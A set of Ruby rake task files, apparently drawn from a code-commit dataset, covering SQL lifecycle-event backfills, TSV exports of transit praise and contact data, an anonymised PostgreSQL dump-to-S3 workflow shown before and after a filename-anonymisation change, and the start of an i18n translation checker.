def joined_at
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT id, 'joined', created_at, created_at, created_at
FROM users
SQL
end
# SQL backfill: a lifecycle event named +key+ from each user's earliest submission.
def earliest_submission(key)
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT user_id, '#{key}', MIN(created_at), MIN(created_at), MIN(created_at)
FROM submissions s
GROUP BY user_id
SQL
end
# SQL backfill: 'commented' events from the earliest comment a user left on
# someone else's submission.
def earliest_comment_given
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT c.user_id, 'commented', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY c.user_id
SQL
end
# SQL backfill: 'received_feedback' events from the earliest comment someone
# else left on a user's own submission.
def earliest_comment_received
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'received_feedback', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY s.user_id
SQL
end
# SQL backfill: 'completed' events from each user's earliest completed submission.
def earliest_submission_completed
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'completed', MIN(s.done_at), MIN(s.done_at), MIN(s.done_at)
FROM submissions s
WHERE s.done_at IS NOT NULL
GROUP BY s.user_id
SQL
end
desc "migrate lifecycle events"
# Runs every lifecycle backfill defined above against the users database.
task :lifecycle do
require 'bundler'
Bundler.require
require_relative '../exercism'
User.connection.execute(joined_at)
# We're missing data for 'fetch'. Inserting submit as placeholder.
User.connection.execute(earliest_submission('fetched'))
User.connection.execute(earliest_submission('submitted'))
User.connection.execute(earliest_comment_received)
User.connection.execute(earliest_comment_given)
User.connection.execute(earliest_submission_completed)
end
end
end
|
require File.dirname(__FILE__) + '/data_loader'
require "#{RAILS_ROOT}/app/helpers/application_helper"
namespace :data do
include DataLoader
desc "Create a spreadsheet of organizations' contact information"
# Writes three tab-separated files (ptes.tsv, council_contacts.tsv,
# operator_contacts.tsv) into the directory given by the DIR env var
# (validated by check_for_dir from DataLoader).
task :create_organization_contact_spreadsheet => :environment do
include ActionController::UrlWriter
ActionController.default_url_options[:host] = MySociety::Config.get("DOMAIN", 'localhost:3000')
check_for_dir
puts "Writing PTE contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'ptes.tsv'), 'w') do |pte_file|
pte_file.write("Passenger Transport Executive\tWikipedia URL\tContact category\tContact location type\tContact email\tNotes\n")
PassengerTransportExecutive.find_each do |pte|
# PTEs without contacts still get a (blank-columned) row.
if pte.pte_contacts.empty?
pte_file.write([pte.name,
pte.wikipedia_url,
'',
'',
'',
''].join("\t") + "\n")
else
pte.pte_contacts.each do |pte_contact|
pte_file.write([pte.name,
pte.wikipedia_url,
pte_contact.category,
pte_contact.location_type,
pte_contact.email,
pte_contact.notes].join("\t") + "\n")
end
end
end
end
puts "Writing council contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'council_contacts.tsv'), 'w') do |council_contacts_file|
council_contacts_file.write("Council\tArea ID\tContact category\tContact district ID\tContact email\tNotes\n")
Council.find_all_without_ptes().each do |council|
council.contacts.each do |council_contact|
council_contacts_file.write([council.name,
council.id,
council_contact.category,
council_contact.district_id,
council_contact.email,
council_contact.notes].join("\t") + "\n")
end
end
end
puts "Writing operator contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'operator_contacts.tsv'), 'w') do |operator_contact_file|
operator_contact_file.write("ID\tOperator\tCompany no\tRegistered address\tCompany URL\tContact category\tContact location\tContact email\tNotes\tRoute count\tURL - has list of routes\n")
# Only operators that actually run routes are listed.
Operator.find(:all, :order => 'name').each do |operator|
if operator.routes.count > 0
if operator.operator_contacts.empty?
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
'',
'',
'',
'',
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
else
operator.operator_contacts.each do |operator_contact|
if operator_contact.location
location_desc = operator_contact.location.description
else
location_desc = ''
end
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
operator_contact.category,
location_desc,
operator_contact.email,
operator_contact.notes,
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
end
end
end
end
end
end
end
Task for dumping a spreadsheet of praise comments.
require File.dirname(__FILE__) + '/data_loader'
require "#{RAILS_ROOT}/app/helpers/application_helper"
namespace :data do
include DataLoader
desc "Create a spreadsheet of praise reports"
# Dumps every comment attached to a location (praise) as praise.tsv in the
# directory given by the DIR env var.
task :create_praise_spreadsheet => :environment do
include ActionController::UrlWriter
ActionController.default_url_options[:host] = MySociety::Config.get("DOMAIN", 'localhost:3000')
include ApplicationHelper
check_for_dir
puts "Writing praise spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'praise.tsv'), 'w') do |praise_file|
headers = ['URL', 'Date', 'Text', 'User']
praise_file.write(headers.join("\t") + "\n")
# Any comment attached to a location is praise
locations = ['Stop', 'StopArea', 'Route', 'SubRoute']
Comment.find_each(:conditions => ['commented_type in (?)', locations]) do |comment|
praise_file.write([commented_url(comment.commented),
comment.confirmed_at.to_s,
comment.text,
comment.user_name].join("\t") + "\n")
end
end
end
desc "Create a spreadsheet of organizations' contact information"
# Writes three tab-separated files (ptes.tsv, council_contacts.tsv,
# operator_contacts.tsv) into the DIR directory.
task :create_organization_contact_spreadsheet => :environment do
include ActionController::UrlWriter
ActionController.default_url_options[:host] = MySociety::Config.get("DOMAIN", 'localhost:3000')
check_for_dir
puts "Writing PTE contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'ptes.tsv'), 'w') do |pte_file|
pte_file.write("Passenger Transport Executive\tWikipedia URL\tContact category\tContact location type\tContact email\tNotes\n")
PassengerTransportExecutive.find_each do |pte|
# PTEs without contacts still get a (blank-columned) row.
if pte.pte_contacts.empty?
pte_file.write([pte.name,
pte.wikipedia_url,
'',
'',
'',
''].join("\t") + "\n")
else
pte.pte_contacts.each do |pte_contact|
pte_file.write([pte.name,
pte.wikipedia_url,
pte_contact.category,
pte_contact.location_type,
pte_contact.email,
pte_contact.notes].join("\t") + "\n")
end
end
end
end
puts "Writing council contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'council_contacts.tsv'), 'w') do |council_contacts_file|
council_contacts_file.write("Council\tArea ID\tContact category\tContact district ID\tContact email\tNotes\n")
Council.find_all_without_ptes().each do |council|
council.contacts.each do |council_contact|
council_contacts_file.write([council.name,
council.id,
council_contact.category,
council_contact.district_id,
council_contact.email,
council_contact.notes].join("\t") + "\n")
end
end
end
puts "Writing operator contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'operator_contacts.tsv'), 'w') do |operator_contact_file|
operator_contact_file.write("ID\tOperator\tCompany no\tRegistered address\tCompany URL\tContact category\tContact location\tContact email\tNotes\tRoute count\tURL - has list of routes\n")
# Only operators that actually run routes are listed.
Operator.find(:all, :order => 'name').each do |operator|
if operator.routes.count > 0
if operator.operator_contacts.empty?
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
'',
'',
'',
'',
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
else
operator.operator_contacts.each do |operator_contact|
if operator_contact.location
location_desc = operator_contact.location.description
else
location_desc = ''
end
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
operator_contact.category,
location_desc,
operator_contact.email,
operator_contact.notes,
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
end
end
end
end
end
end
end
require_relative 'rake_helpers/dump_file_writer'
require_relative 'rake_helpers/s3_bucket'
require_relative 'rake_helpers/rake_utils'
require 'fileutils'
require 'open3'
include RakeUtils
namespace :db do
namespace :dump do
desc <<~ldesc
Run dump file job from local machine
* requires kubectl and access to git-crypted secrets
Usage:
# runs dump job against staging using latest master branch build
rake db:dump:run_job['staging']
# # runs dump job against dev using my-branch-latest build
rake db:dump:run_job['dev','my-branch-latest']
ldesc
# Kicks off the kubernetes dump job for +host+ with +build_tag+ (default
# 'latest'), streams the job's combined stdout/stderr, raises on failure,
# then offers to prune all but the latest dump file from s3.
task :run_job, [:host, :build_tag] => :environment do |_task, args|
host = args.host
build_tag = args.build_tag || 'latest'
raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
script = Rails.root.join('kubernetes_deploy', 'scripts', 'job.sh')
cmd = "#{script} dump #{host} #{build_tag}"
Open3.popen2e(cmd) do |stdin, stdout_and_stderr, wait_thr|
stdout_and_stderr.each_line do |line|
puts line
end
raise ['Failure'.red, ': ', cmd].join unless wait_thr.value.success?
end
continue?'Do you want to delete all but the latest dump file from s3?'
Rake::Task['db:dump:delete_s3_dumps'].invoke(host)
end
desc 'Create anonymised database dump, compress (gzip) and upload to s3 - run on host via job (see run_job)'
# Dumps the database (excluding sensitive tables), appends anonymised rows
# for each excluded table via the per-table tasks below, gzips the result
# and uploads it to the host's s3 bucket.
task :anonymised => :environment do
  cmd = 'pg_dump --version'
  puts '---------------------------'
  print "Using: #{%x(#{cmd})}".yellow
  host = Rails.host.env
  puts "Host environment: #{host || 'not set'}"
  filename = File.join('tmp', "#{Time.now.strftime('%Y%m%d%H%M%S')}_dump.psql")
  # Fixed: restored the lost #{filename} interpolations in the status
  # message and in pg_dump's -f argument (previously corrupted to "#(unknown)").
  shell_working "exporting unanonymised database data to #{filename}..." do
    cmd = "pg_dump $DATABASE_URL --no-owner --no-privileges --no-password #{sensitive_table_exclusions} -f #{filename}"
    system(cmd)
  end
  # $arel_silence_type_casting_deprecation = true
  excluded_tables.each do |table|
    task_name = "db:dump:#{table}"
    Rake::Task[task_name].invoke(filename)
  end
  # $arel_silence_type_casting_deprecation = false
  compressed_file = compress_file(filename)
  shell_working "writing dump file #{filename}.gz to #{host}'s s3 bucket..." do
    s3_bucket = S3Bucket.new(host)
    s3_bucket.put_object(compressed_file, File.read(compressed_file))
  end
  Rake::Task['db:dump:list_s3_dumps'].invoke(Rails.host.env)
end
desc 'List s3 database dump files'
# Prints key, last-modified time and human-readable size for every dump
# file in the host's s3 bucket, newest first.
task :list_s3_dumps, [:host] => :environment do |_task, args|
require 'action_view'
include ActionView::Helpers::NumberHelper
host = args.host
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
abort('No dump files found!'.yellow) if dump_files.empty?
puts "------------list of dump files on #{host}----------------"
dump_files.sort_by(&:last_modified).reverse.map do |object|
puts "Key: #{object.key}"
puts "Last modified: #{object.last_modified.iso8601}"
puts "Size: #{number_to_human_size(object.content_length)}"
puts '-----------------------------------------------------'
end
end
desc 'Delete all but latest s3 database dump files'
# Deletes dump files from the host's bucket, keeping the newest one unless
# the second task argument is the literal string 'all'.
task :delete_s3_dumps, [:host, :all] => :environment do |_task, args|
host = args.host
start = args.all.eql?('all') ? 0 : 1
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
dump_files.sort_by(&:last_modified).reverse[start..].map do |object|
print "Deleting #{object.key}..."
object.delete
puts 'done'.green
end
end
desc 'Copy s3 bucket dump file locally and decompress'
# Streams the s3 object +key+ from +host+'s bucket into tmp/<host>/ and
# decompresses it in place.
task :copy_s3_dump, [:key, :host] => :environment do |_task, args|
  dump_file, host = args.key, args.host
  raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
  # stream object directly
  # https://aws.amazon.com/blogs/developer/downloading-objects-from-amazon-s3-using-the-aws-sdk-for-ruby/
  dirname = Rails.root.join('tmp', "#{host}")
  FileUtils.mkpath(dirname)
  local_filename = dirname.join(dump_file.split(File::Separator).last)
  s3_bucket = S3Bucket.new(host)
  shell_working "Copying S3 file #{dump_file} to local file #{local_filename} data" do
    File.open(local_filename, 'wb') do |file|
      # Fixed: dropped the unused `reap` local; get_object streams into file.
      s3_bucket.get_object(dump_file, target: file)
    end
  end
  decompress_file(local_filename)
end
desc 'Export anonymised providers data'
# Appends provider rows to the dump file with names replaced by fakes.
task :providers, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Provider.find_each(batch_size: batch_size) do |provider|
# The id suffix keeps generated names unique.
provider.name = [Faker::Company.name, provider.id].join(' ')
writer.call(provider)
end
end
end
end
desc 'Export anonymised defendants data'
# Appends defendant rows with faked first and last names.
task :defendants, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Defendant.find_each(batch_size: batch_size) do |defendant|
defendant.first_name = Faker::Name.first_name
defendant.last_name = Faker::Name.last_name
writer.call(defendant)
end
end
end
end
desc 'Export anonymised users data'
# Appends user rows: passwords are replaced by a fixed bcrypt hash, and
# names/emails are anonymised unless the email is on a whitelisted domain.
task :users, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
whitelist_domains = %w(example.com agfslgfs.com)
write_to_file(args.file) do |writer|
User.find_each(batch_size: batch_size) do |user|
user.encrypted_password = '$2a$10$r4CicQylcCuq34E1fysqEuRlWRN4tiTPUOHwksecXT.hbkukPN5F2'
unless whitelist_domains.detect { |domain| user.email.end_with?(domain) }
user.first_name = Faker::Name.first_name
user.last_name = Faker::Name.last_name
user.email = "#{user.id}@anonymous.com"
end
writer.call(user)
end
end
end
end
desc 'Export anonymised messages data'
# Appends message rows with lorem bodies and faked attachment names.
task :messages, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Message.find_each(batch_size: batch_size) do |message|
message.body = Faker::Lorem.sentence(word_count: 6, supplemental: false, random_words_to_add: 10)
if message.attachment_file_name.present?
message.attachment_file_name = fake_file_name(message.attachment_file_name)
end
writer.call(message)
end
end
end
end
desc 'Export anonymised document data'
# Appends document rows with faked file names; the converted preview name
# keeps the original extension in its stem unless it is already a pdf.
task :documents, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Document.find_each(batch_size: batch_size) do |document|
with_file_name(fake_file_name(document.document_file_name)) do |file_name, ext|
document.document_file_name = "#{file_name}.#{ext}"
document.converted_preview_document_file_name = "#{file_name}#{ '.' + ext unless ext == 'pdf' }.pdf"
document.file_path = "/s3/path/to/#{file_name}.#{ext}"
end
writer.call(document)
end
end
end
end
desc 'Export anonymised claims data'
# Appends claim rows: free-text fields become lorem paragraphs and provider
# refs are letter-substituted via a random translation alphabet.
task :claims, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Claim::BaseClaim.find_each(batch_size: batch_size) do |claim|
claim.travel_expense_additional_information = fake_paragraphs if claim.travel_expense_additional_information.present?
claim.additional_information = fake_paragraphs if claim.additional_information.present?
claim.providers_ref = claim.providers_ref.tr('a-zA-Z', translation) if claim.providers_ref.present?
writer.call(claim)
end
end
end
end
private
# Deployment environments a dump job may be run against.
def valid_hosts
  ['dev', 'dev-lgfs', 'staging', 'api-sandbox', 'production']
end
# Tables whose rows are withheld from the raw dump and exported separately
# in anonymised form.
def excluded_tables
  ['providers', 'users', 'claims', 'defendants', 'messages', 'documents']
end

# pg_dump arguments excluding the data of every sensitive table.
def sensitive_table_exclusions
  # make sure a db:dump task exists for each of the excluded tables (i.e. db:dump:providers)
  flags = excluded_tables.map { |name| "--exclude-table-data #{name}" }
  flags.join(' ')
end
# Builds a random file name while preserving the original's extension.
# (gsub(/\//,'_') replaced by the cheaper, equivalent tr('/', '_').)
def fake_file_name original_file_name
  *file_parts, _last = Faker::File.file_name.tr('/', '_').split('.')
  file_parts.join + '.' + original_file_name.split('.').last
end

# Yields the base name and extension of +file_name+.
# Fixed: multi-dot base names are re-joined with '.' instead of being
# concatenated (previously 'a.b.c' yielded base 'ab' instead of 'a.b').
def with_file_name file_name, &block
  *base_parts, ext = file_name.split('.')
  yield base_parts.join('.'), ext if block_given?
end
# Returns between 1 and +max_paragraph_count+ fake paragraphs joined by newlines.
def fake_paragraphs max_paragraph_count=4
  Faker::Lorem.paragraphs(number: max_paragraph_count).pop(rand(1..max_paragraph_count)).join("\n")
end

# Random substitution alphabet for String#tr: shuffled a-z followed by
# shuffled A-Z, mirroring the 'a-zA-Z' source ranges used by callers.
def translation
  lower = ('a'..'z').to_a.shuffle
  upper = ('A'..'Z').to_a.shuffle
  (lower + upper).join
end
# Opens a DumpFileWriter on +name+ and yields a callable that appends one
# model at a time through it.
def write_to_file(name)
  writer = DumpFileWriter.new(name)
  emit = lambda do |model|
    writer.model = model
    writer.write
  end
  yield emit
end

# Batch size for find_each; optimum determined from benchmarking.
def batch_size
  @batch_size ||= 200
end
end
end
Anonymise entire filename
Previously the extension (text after last dot)
was not anonymised. However, some files with extremely
long names are being uploaded and the names truncated.
This can result in an unanonymised part of the file name.
This solution renames the file and relies on the
MIME content_type to then reattach the correct
extension.
require_relative 'rake_helpers/dump_file_writer'
require_relative 'rake_helpers/s3_bucket'
require_relative 'rake_helpers/rake_utils'
require 'fileutils'
require 'open3'
include RakeUtils
namespace :db do
namespace :dump do
desc <<~ldesc
Run dump file job from local machine
* requires kubectl and access to git-crypted secrets
Usage:
# runs dump job against staging using latest master branch build
rake db:dump:run_job['staging']
# # runs dump job against dev using my-branch-latest build
rake db:dump:run_job['dev','my-branch-latest']
ldesc
# Starts the kubernetes dump job for +host+ with +build_tag+ (default
# 'latest'), streams its output, raises on failure, then offers to prune
# all but the newest dump file from s3.
task :run_job, [:host, :build_tag] => :environment do |_task, args|
host = args.host
build_tag = args.build_tag || 'latest'
raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
script = Rails.root.join('kubernetes_deploy', 'scripts', 'job.sh')
cmd = "#{script} dump #{host} #{build_tag}"
Open3.popen2e(cmd) do |stdin, stdout_and_stderr, wait_thr|
stdout_and_stderr.each_line do |line|
puts line
end
raise ['Failure'.red, ': ', cmd].join unless wait_thr.value.success?
end
continue?'Do you want to delete all but the latest dump file from s3?'
Rake::Task['db:dump:delete_s3_dumps'].invoke(host)
end
desc 'Create anonymised database dump, compress (gzip) and upload to s3 - run on host via job (see run_job)'
# Dumps the database (excluding sensitive tables), appends anonymised rows
# for each excluded table via the per-table tasks below, gzips the result
# and uploads it to the host's s3 bucket.
task :anonymised => :environment do
  cmd = 'pg_dump --version'
  puts '---------------------------'
  print "Using: #{%x(#{cmd})}".yellow
  host = Rails.host.env
  puts "Host environment: #{host || 'not set'}"
  filename = File.join('tmp', "#{Time.now.strftime('%Y%m%d%H%M%S')}_dump.psql")
  # Fixed: restored the lost #{filename} interpolations in the status
  # message and in pg_dump's -f argument (previously corrupted to "#(unknown)").
  shell_working "exporting unanonymised database data to #{filename}..." do
    cmd = "pg_dump $DATABASE_URL --no-owner --no-privileges --no-password #{sensitive_table_exclusions} -f #{filename}"
    system(cmd)
  end
  # $arel_silence_type_casting_deprecation = true
  excluded_tables.each do |table|
    task_name = "db:dump:#{table}"
    Rake::Task[task_name].invoke(filename)
  end
  # $arel_silence_type_casting_deprecation = false
  compressed_file = compress_file(filename)
  shell_working "writing dump file #{filename}.gz to #{host}'s s3 bucket..." do
    s3_bucket = S3Bucket.new(host)
    s3_bucket.put_object(compressed_file, File.read(compressed_file))
  end
  Rake::Task['db:dump:list_s3_dumps'].invoke(Rails.host.env)
end
desc 'List s3 database dump files'
# Prints key, last-modified time and human-readable size for every dump
# file in the host's s3 bucket, newest first.
task :list_s3_dumps, [:host] => :environment do |_task, args|
require 'action_view'
include ActionView::Helpers::NumberHelper
host = args.host
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
abort('No dump files found!'.yellow) if dump_files.empty?
puts "------------list of dump files on #{host}----------------"
dump_files.sort_by(&:last_modified).reverse.map do |object|
puts "Key: #{object.key}"
puts "Last modified: #{object.last_modified.iso8601}"
puts "Size: #{number_to_human_size(object.content_length)}"
puts '-----------------------------------------------------'
end
end
desc 'Delete all but latest s3 database dump files'
# Deletes dump files from the host's bucket, keeping the newest one unless
# the second task argument is the literal string 'all'.
task :delete_s3_dumps, [:host, :all] => :environment do |_task, args|
host = args.host
start = args.all.eql?('all') ? 0 : 1
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
dump_files.sort_by(&:last_modified).reverse[start..].map do |object|
print "Deleting #{object.key}..."
object.delete
puts 'done'.green
end
end
desc 'Copy s3 bucket dump file locally and decompress'
# Streams the s3 object +key+ from +host+'s bucket into tmp/<host>/ and
# decompresses it in place.
task :copy_s3_dump, [:key, :host] => :environment do |_task, args|
  dump_file, host = args.key, args.host
  raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
  # stream object directly
  # https://aws.amazon.com/blogs/developer/downloading-objects-from-amazon-s3-using-the-aws-sdk-for-ruby/
  dirname = Rails.root.join('tmp', "#{host}")
  FileUtils.mkpath(dirname)
  local_filename = dirname.join(dump_file.split(File::Separator).last)
  s3_bucket = S3Bucket.new(host)
  shell_working "Copying S3 file #{dump_file} to local file #{local_filename} data" do
    File.open(local_filename, 'wb') do |file|
      # Fixed: dropped the unused `reap` local; get_object streams into file.
      s3_bucket.get_object(dump_file, target: file)
    end
  end
  decompress_file(local_filename)
end
desc 'Export anonymised providers data'
# Appends provider rows to the dump file with names replaced by fakes.
task :providers, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Provider.find_each(batch_size: batch_size) do |provider|
# The id suffix keeps generated names unique.
provider.name = [Faker::Company.name, provider.id].join(' ')
writer.call(provider)
end
end
end
end
desc 'Export anonymised defendants data'
# Appends defendant rows with faked first and last names.
task :defendants, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Defendant.find_each(batch_size: batch_size) do |defendant|
defendant.first_name = Faker::Name.first_name
defendant.last_name = Faker::Name.last_name
writer.call(defendant)
end
end
end
end
desc 'Export anonymised users data'
# Appends user rows: passwords are replaced by a fixed bcrypt hash, and
# names/emails are anonymised unless the email is on a whitelisted domain.
task :users, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
whitelist_domains = %w(example.com agfslgfs.com)
write_to_file(args.file) do |writer|
User.find_each(batch_size: batch_size) do |user|
user.encrypted_password = '$2a$10$r4CicQylcCuq34E1fysqEuRlWRN4tiTPUOHwksecXT.hbkukPN5F2'
unless whitelist_domains.detect { |domain| user.email.end_with?(domain) }
user.first_name = Faker::Name.first_name
user.last_name = Faker::Name.last_name
user.email = "#{user.id}@anonymous.com"
end
writer.call(user)
end
end
end
end
desc 'Export anonymised messages data'
# Appends message rows with lorem bodies; attachment names are regenerated
# entirely from the attachment's MIME content type.
task :messages, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Message.find_each(batch_size: batch_size) do |message|
message.body = Faker::Lorem.sentence(word_count: 6, supplemental: false, random_words_to_add: 10)
if message.attachment_file_name.present?
message.attachment_file_name = fake_file_name(content_type: message.attachment_content_type)
end
writer.call(message)
end
end
end
end
desc 'Export anonymised document data'
# Appends document rows with names regenerated from the document's MIME
# content type; the preview name keeps the extension in its stem unless pdf.
task :documents, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Document.find_each(batch_size: batch_size) do |document|
with_file_name(fake_file_name(content_type: document.document_content_type)) do |file_name, ext|
document.document_file_name = "#{file_name}.#{ext}"
document.converted_preview_document_file_name = "#{file_name}#{ '.' + ext unless ext == 'pdf' }.pdf"
document.file_path = "/s3/path/to/#{file_name}.#{ext}"
end
writer.call(document)
end
end
end
end
desc 'Export anonymised claims data'
# Appends claim rows: free-text fields become lorem paragraphs and provider
# refs are letter-substituted via a random translation alphabet.
task :claims, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Claim::BaseClaim.find_each(batch_size: batch_size) do |claim|
claim.travel_expense_additional_information = fake_paragraphs if claim.travel_expense_additional_information.present?
claim.additional_information = fake_paragraphs if claim.additional_information.present?
claim.providers_ref = claim.providers_ref.tr('a-zA-Z', translation) if claim.providers_ref.present?
writer.call(claim)
end
end
end
end
private
def valid_hosts
%w[dev dev-lgfs staging api-sandbox production]
end
def excluded_tables
%w(providers users claims defendants messages documents)
end
def sensitive_table_exclusions
# make sure a db:dump task exists for each of the excluded tables (i.e. db:dump:providers)
excluded_tables.map { |table| "--exclude-table-data #{table}" }.join(' ')
end
def fake_file_name(content_type:)
Faker::File.file_name(dir: 'fake_file_name', ext: MIME::Types[content_type].first.extensions.first).tr('/','_')
end
def with_file_name file_name, &block
*file_name, ext = file_name.split('.')
yield file_name.join, ext if block_given?
end
def fake_paragraphs max_paragraph_count=4
Faker::Lorem.paragraphs(number: max_paragraph_count).pop(rand(1..max_paragraph_count)).join("\n")
end
def translation
[('a'..'z'), ('A'..'Z')].map(&:to_a).map(&:shuffle).join
end
# Open a DumpFileWriter on +name+ and yield a callable that writes one
# model per invocation.
def write_to_file(name)
dump_writer = DumpFileWriter.new(name)
write_model = lambda do |model|
dump_writer.model = model
dump_writer.write
end
yield write_model
end
# optimum determined from benchmarking
# Memoised find_each batch size shared by the export tasks above.
def batch_size
@batch_size ||= 200
end
end
end
|
namespace :i18n do
# Mixed into Hash (Hash.send :include, HashExtensions) to convert between
# nested hashes and flat dot-separated key maps, and to sort recursively.
module HashExtensions
# {'a' => {'b' => 1}} becomes {'a.b' => 1}.
def flatten_keys(result={}, prefix='')
each_pair do |key, value|
if value.is_a?(Hash)
value.flatten_keys(result, "#{prefix}#{key}.")
else
result["#{prefix}#{key}"] = value
end
end
result
end
# {'a.b' => 1} becomes {'a' => {'b' => 1}}.
def expand_keys(result = {})
each_pair do |key, value|
segments = key.split('.')
leaf = segments.pop
node = segments.inject(result) { |hash, segment| hash[segment] ||= {} }
node[leaf] = value
end
result
end
# Recursively order keys (string sort) into an ActiveSupport::OrderedHash
# for stable serialisation output.
def to_ordered
keys.sort_by(&:to_s).inject ActiveSupport::OrderedHash.new do |ordered, key|
value = fetch(key)
ordered[key] = value.is_a?(Hash) ? value.to_ordered : value
ordered
end
end
end
# Derive the default I18n scope ("dot.separated.path") from a source file's
# path; returns '' when no scope applies.
def infer_scope(filename)
if filename =~ /app\/views\/.*\.handlebars\z/
filename.gsub(/.*app\/views\/jst\/_?|\.handlebars\z/, '').underscore.gsub(/\/_?/, '.')
elsif filename =~ /app\/controllers\//
scope = filename.gsub(/.*app\/controllers\/|controller.rb/, '').gsub(/\/_?|_\z/, '.')
# the base controller maps to the root scope
scope == 'application.' ? '' : scope
elsif filename =~ /app\/messages\//
filename.gsub(/.*app\/|erb/, '').gsub(/\/_?/, '.')
elsif filename =~ /app\/models\//
scope = filename.gsub(/.*app\/models\/|rb/, '')
# STI superclasses share the root scope rather than getting their own
STI_SUPERCLASSES.include?(scope) ? '' : scope
elsif filename =~ /app\/views\//
filename.gsub(/.*app\/views\/|(html\.|fbml\.)?erb\z/, '').gsub(/\/_?/, '.')
else
''
end
end
desc "Verifies all translation calls"
# Walks every Ruby/ERB, JavaScript and Handlebars source, extracts the
# translation calls and verifies them against the loaded :en translations.
# Set ONLY=path1,path2 to restrict the files checked.
task :check => :environment do
Bundler.require :i18n_tools
# Normalise the ONLY list into concrete file paths (globs expanded,
# directories searched recursively).
only = if ENV['ONLY']
ENV['ONLY'].split(',').map{ |path|
path = '**/' + path if path =~ /\*/
path = './' + path unless path =~ /\A.?\//
if path =~ /\*/
path = Dir.glob(path)
elsif path !~ /\.(e?rb|js)\z/
path = Dir.glob(path + '/**/*')
end
path
}.flatten
end
# Model classes used as STI superclasses; their files map to the root scope.
# NOTE(review): shells out to grep/sed, so this only works on unix-like hosts.
STI_SUPERCLASSES = (`grep '^class.*<' ./app/models/*rb|grep -v '::'|sed 's~.*< ~~'|sort|uniq`.split("\n") - ['OpenStruct', 'Tableless']).
map{ |name| name.underscore + '.' }
# Only colourise output when writing to a terminal.
COLOR_ENABLED = ($stdout.tty? rescue false)
def color(text, color_code)
COLOR_ENABLED ? "#{color_code}#{text}\e[0m" : text
end
def green(text)
color(text, "\e[32m")
end
def red(text)
color(text, "\e[31m")
end
@errors = []
# Yields each file to the extractor block; prints "." per checked file and
# "F" (recording the error) per failure.
def process_files(files)
files.each do |file|
begin
print green "." if yield file
rescue SyntaxError, StandardError
@errors << "#{$!}\n#{file}"
print red "F"
end
end
end
t = Time.now
I18n.available_locales
# Recursively stringify translation keys so lookups match extracted calls.
stringifier = proc { |hash, (key, value)|
hash[key.to_s] = value.is_a?(Hash) ?
value.inject({}, &stringifier) :
value
hash
}
@translations = I18n.backend.send(:translations)[:en].inject({}, &stringifier)
# Ruby
